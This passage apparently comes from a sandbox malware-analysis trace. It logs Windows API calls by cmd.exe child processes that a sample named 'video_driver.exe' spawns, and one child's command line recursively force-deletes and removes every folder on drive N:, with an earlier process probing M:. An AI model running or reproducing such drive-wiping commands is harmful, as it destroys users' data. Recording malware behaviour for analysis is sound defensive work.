dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x535760 [0068.031] FindClose (in: hFindFile=0x535760 | out: hFindFile=0x535760) returned 1 [0068.031] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x31f6bc | out: lpFindFileData=0x31f6bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x535760 [0068.031] FindClose (in: hFindFile=0x535760 | out: hFindFile=0x535760) returned 1 [0068.031] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.031] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.031] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.031] GetProcessHeap () returned 0x520000 [0068.031] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534c70 | out: hHeap=0x520000) returned 1 [0068.032] GetEnvironmentStringsW () returned 0x534180* [0068.032] GetProcessHeap () returned 0x520000 [0068.032] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xb36) returned 0x535fa0 [0068.032] FreeEnvironmentStringsW (penv=0x534180) returned 1 [0068.032] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.032] GetProcessHeap () returned 0x520000 [0068.032] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5317c8 | out: hHeap=0x520000) returned 1 [0068.032] GetProcessHeap () returned 0x520000 [0068.032] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x400e) returned 0x536ae0 [0068.032] GetProcessHeap () returned 0x520000 [0068.032] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xa0) returned 0x532e50 [0068.032] GetProcessHeap () returned 0x520000 [0068.032] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x536ae0 | out: hHeap=0x520000) returned 1 [0068.033] GetConsoleOutputCP () returned 0x1b5 [0068.033] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.033] GetUserDefaultLCID () returned 0x409 [0068.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x31fa80, cchData=128 | out: lpLCData="0") returned 2 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x31fa80, cchData=128 | out: lpLCData="0") returned 2 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x31fa80, cchData=128 | out: lpLCData="1") returned 2 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0068.034] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0068.034] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0068.036] GetProcessHeap () returned 0x520000 [0068.036] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20c) returned 0x532ef8 [0068.036] GetConsoleTitleW (in: lpConsoleTitle=0x532ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0068.036] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.036] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0068.036] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0068.036] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0068.037] GetProcessHeap () returned 0x520000 [0068.037] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x400a) returned 0x536ae0 [0068.037] GetProcessHeap () returned 0x520000 [0068.037] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x4008) returned 0x53aaf8 [0068.037] GetProcessHeap () returned 0x520000 [0068.037] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1a) returned 0x5357e0 [0068.037] GetEnvironmentVariableW (in: lpName="p IN (\"M", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.037] _wcsicmp (_String1="p IN (\"M", _String2="CD") returned 13 [0068.038] _wcsicmp (_String1="p IN (\"M", _String2="ERRORLEVEL") returned 11 [0068.038] _wcsicmp (_String1="p IN (\"M", _String2="CMDEXTVERSION") returned 13 [0068.038] _wcsicmp (_String1="p IN (\"M", _String2="CMDCMDLINE") returned 13 [0068.038] _wcsicmp (_String1="p IN (\"M", _String2="DATE") returned 12 [0068.038] _wcsicmp (_String1="p IN (\"M", _String2="TIME") returned -4 [0068.038] _wcsicmp (_String1="p IN (\"M", _String2="RANDOM") returned -2 [0068.038] _wcsicmp (_String1="p IN (\"M", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.038] GetProcessHeap () returned 0x520000 [0068.038] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5357e0 | out: hHeap=0x520000) returned 1 [0068.038] GetProcessHeap () returned 0x520000 [0068.038] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53aaf8 | out: hHeap=0x520000) returned 1 [0068.038] GetProcessHeap () returned 0x520000 [0068.038] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x4008) returned 0x53aaf8 [0068.038] GetProcessHeap () returned 0x520000 [0068.038] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53aaf8 | out: hHeap=0x520000) returned 1 [0068.038] GetProcessHeap () returned 0x520000 [0068.038] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x536ae0 | out: hHeap=0x520000) returned 1 [0068.038] _wcsicmp (_String1="if", _String2=")") returned 64 [0068.038] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0068.038] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0068.038] _wcsicmp (_String1="IF", _String2="if") returned 0 [0068.039] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0068.039] GetProcessHeap () returned 0x520000 [0068.039] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x58) returned 0x533110 [0068.039] GetProcessHeap () returned 0x520000 [0068.039] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xe) returned 0x52ffc0 [0068.039] GetProcessHeap () returned 0x520000 [0068.039] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x20) returned 0x5357e0 [0068.040] GetProcessHeap () returned 0x520000 [0068.040] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5357e0, Size=0x16) returned 0x531800 [0068.040] GetProcessHeap () returned 0x520000 [0068.040] RtlSizeHeap (HeapHandle=0x520000, Flags=0x0, MemoryPointer=0x531800) returned 0x16 [0068.040] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0068.040] GetProcessHeap () returned 0x520000 [0068.040] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x58) returned 0x533170 [0068.040] GetProcessHeap () returned 0x520000 [0068.040] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x14) returned 0x5331d0 [0068.040] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0068.040] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0068.041] GetProcessHeap () returned 0x520000 [0068.041] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x12) returned 0x5331f0 [0068.041] GetProcessHeap () returned 0x520000 [0068.041] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1c) returned 0x5357e0 [0068.041] GetProcessHeap () returned 0x520000 [0068.041] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5357e0, Size=0x14) returned 0x533210 [0068.041] GetProcessHeap () returned 0x520000 [0068.041] RtlSizeHeap (HeapHandle=0x520000, Flags=0x0, MemoryPointer=0x533210) returned 0x14 [0068.041] _wcsicmp (_String1="del", _String2=")") returned 59 [0068.041] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0068.042] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0068.042] _wcsicmp (_String1="IF", _String2="del") returned 5 [0068.042] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0068.042] _wcsicmp (_String1="REM", _String2="del") returned 14 [0068.042] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0068.042] GetProcessHeap () returned 0x520000 [0068.042] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x58) returned 0x533230 [0068.042] GetProcessHeap () returned 0x520000 [0068.042] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x10) returned 0x52ffd8 [0068.043] GetProcessHeap () returned 0x520000 [0068.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x28) returned 0x533290 [0068.043] GetProcessHeap () returned 0x520000 [0068.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x58) returned 0x5332c0 [0068.044] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0068.044] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0068.044] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0068.044] GetProcessHeap () returned 0x520000 [0068.044] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x58) returned 0x533320 [0068.044] GetProcessHeap () returned 0x520000 [0068.044] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x44) returned 0x533380 [0068.044] GetProcessHeap () returned 0x520000 [0068.044] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x14) returned 0x5333d0 [0068.045] GetProcessHeap () returned 0x520000 [0068.045] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5333d0, Size=0x12) returned 0x5333d0 [0068.045] GetProcessHeap () returned 0x520000 [0068.045] RtlSizeHeap (HeapHandle=0x520000, Flags=0x0, MemoryPointer=0x5333d0) returned 0x12 [0068.045] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0068.045] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0068.045] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0068.045] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0068.045] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0068.045] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0068.045] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0068.046] GetProcessHeap () returned 0x520000 [0068.046] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x12) returned 0x5333f0 [0068.046] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0068.047] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0068.047] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0068.047] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0068.047] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0068.047] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0068.047] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0068.047] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0068.047] GetProcessHeap () returned 0x520000 [0068.047] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x58) returned 0x533410 [0068.047] GetProcessHeap () returned 0x520000 [0068.047] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x14) returned 0x533470 [0068.047] GetProcessHeap () returned 0x520000 [0068.047] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x20) returned 0x5357e0 [0068.049] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0068.050] GetFullPathNameW (in: lpFileName="M:", nBufferLength=0x208, lpBuffer=0x31f770, lpFilePart=0x31f51c | out: lpBuffer="M:\\", lpFilePart=0x31f51c*=0x0) returned 0x3 [0068.051] wcsncmp (_String1="M:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -15 [0068.054] GetFileAttributesW (lpFileName="M:\\" (normalized: "m:")) returned 0xffffffff [0068.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.055] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.055] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.055] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.055] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.055] SetConsoleInputExeNameW () returned 0x1 [0068.055] GetConsoleOutputCP () returned 0x1b5 [0068.056] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.056] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.056] exit (_Code=0) Process: id = "58" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41581000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"N:\" del /f /s /q \"N:\" & FOR /D %p IN (\"N:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 86 os_tid = 0x7c0 [0068.162] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22ff64 | out: lpSystemTimeAsFileTime=0x22ff64*(dwLowDateTime=0x66f1740, dwHighDateTime=0x1d62400)) [0068.162] GetCurrentProcessId () returned 0x67c [0068.162] GetCurrentThreadId () returned 0x7c0 [0068.162] GetTickCount () returned 0x1148759 [0068.162] QueryPerformanceCounter (in: lpPerformanceCount=0x22ff5c | out: lpPerformanceCount=0x22ff5c*=18829534686) returned 1 [0068.163] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0068.163] __set_app_type (_Type=0x1) [0068.163] __p__fmode () returned 0x770331f4 [0068.164] __p__commode () returned 0x770331fc [0068.164] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0068.164] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0068.164] GetCurrentThreadId () returned 0x7c0 [0068.164] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7c0) returned 0x60 [0068.165] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.165] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0068.165] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.165] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.165] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fef4 | out: phkResult=0x22fef4*=0x0) returned 0x2 [0068.165] VirtualQuery (in: lpAddress=0x22ff2b, lpBuffer=0x22fec4, dwLength=0x1c | out: lpBuffer=0x22fec4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.165] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fec4, dwLength=0x1c | out: lpBuffer=0x22fec4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.166] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fec4, dwLength=0x1c | out: lpBuffer=0x22fec4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.166] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fec4, dwLength=0x1c | out: lpBuffer=0x22fec4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.166] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fec4, dwLength=0x1c | out: lpBuffer=0x22fec4*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x39000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.166] GetConsoleOutputCP () returned 0x1b5 [0068.166] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.189] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0068.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.189] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.190] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.190] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.190] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.190] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.190] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.190] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.190] GetEnvironmentStringsW () returned 0x5e20f8* [0068.190] GetProcessHeap () returned 0x5d0000 [0068.190] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e2bd0 [0068.191] FreeEnvironmentStringsW (penv=0x5e20f8) returned 1 [0068.191] GetProcessHeap () returned 0x5d0000 [0068.191] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x5e1898 [0068.191] GetEnvironmentStringsW () returned 0x5e20f8* [0068.191] GetProcessHeap () returned 0x5d0000 [0068.191] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e36a8 [0068.191] FreeEnvironmentStringsW (penv=0x5e20f8) returned 1 [0068.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee64 | out: phkResult=0x22ee64*=0x68) returned 0x0 [0068.191] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x0, lpData=0x22ee70*=0x0, lpcbData=0x22ee68*=0x1000) returned 0x2 [0068.191] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x4, lpData=0x22ee70*=0x1, lpcbData=0x22ee68*=0x4) returned 0x0 [0068.191] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x0, lpData=0x22ee70*=0x1, lpcbData=0x22ee68*=0x1000) returned 0x2 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x4, lpData=0x22ee70*=0x0, lpcbData=0x22ee68*=0x4) returned 0x0 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x4, lpData=0x22ee70*=0x40, lpcbData=0x22ee68*=0x4) returned 0x0 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x4, lpData=0x22ee70*=0x40, lpcbData=0x22ee68*=0x4) returned 0x0 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x0, lpData=0x22ee70*=0x40, lpcbData=0x22ee68*=0x1000) returned 0x2 [0068.192] RegCloseKey (hKey=0x68) returned 0x0 [0068.192] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee64 | out: phkResult=0x22ee64*=0x68) returned 0x0 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x0, lpData=0x22ee70*=0x40, lpcbData=0x22ee68*=0x1000) returned 0x2 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x4, lpData=0x22ee70*=0x1, lpcbData=0x22ee68*=0x4) returned 0x0 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x0, lpData=0x22ee70*=0x1, lpcbData=0x22ee68*=0x1000) returned 0x2 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x4, lpData=0x22ee70*=0x0, lpcbData=0x22ee68*=0x4) returned 0x0 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x4, lpData=0x22ee70*=0x9, lpcbData=0x22ee68*=0x4) returned 0x0 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x4, lpData=0x22ee70*=0x9, lpcbData=0x22ee68*=0x4) returned 0x0 [0068.192] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee6c, lpData=0x22ee70, lpcbData=0x22ee68*=0x1000 | out: lpType=0x22ee6c*=0x0, lpData=0x22ee70*=0x9, lpcbData=0x22ee68*=0x1000) returned 0x2 [0068.192] RegCloseKey (hKey=0x68) returned 0x0 [0068.192] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6e [0068.193] srand (_Seed=0x5eb34b6e) [0068.193] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"N:\" del /f /s /q \"N:\" & FOR /D %p IN (\"N:\") DO rmdir \"%p\" /s /q" [0068.193] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"N:\" del /f /s /q \"N:\" & FOR /D %p IN (\"N:\") DO rmdir \"%p\" /s /q" [0068.193] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.193] GetProcessHeap () returned 0x5d0000 [0068.193] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e20f8 [0068.193] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5e2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.193] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.193] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.193] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.194] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.194] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.194] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.194] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.194] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.194] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.194] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.194] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.194] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.194] GetProcessHeap () returned 0x5d0000 [0068.194] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e2bd0 | out: hHeap=0x5d0000) returned 1 [0068.194] GetEnvironmentStringsW () returned 0x5e2310* [0068.194] GetProcessHeap () returned 0x5d0000 [0068.194] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xae2) returned 0x5e4c70 [0068.194] FreeEnvironmentStringsW (penv=0x5e2310) returned 1 [0068.194] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.194] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.195] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.195] _wcsicmp (_String1="KEYS", 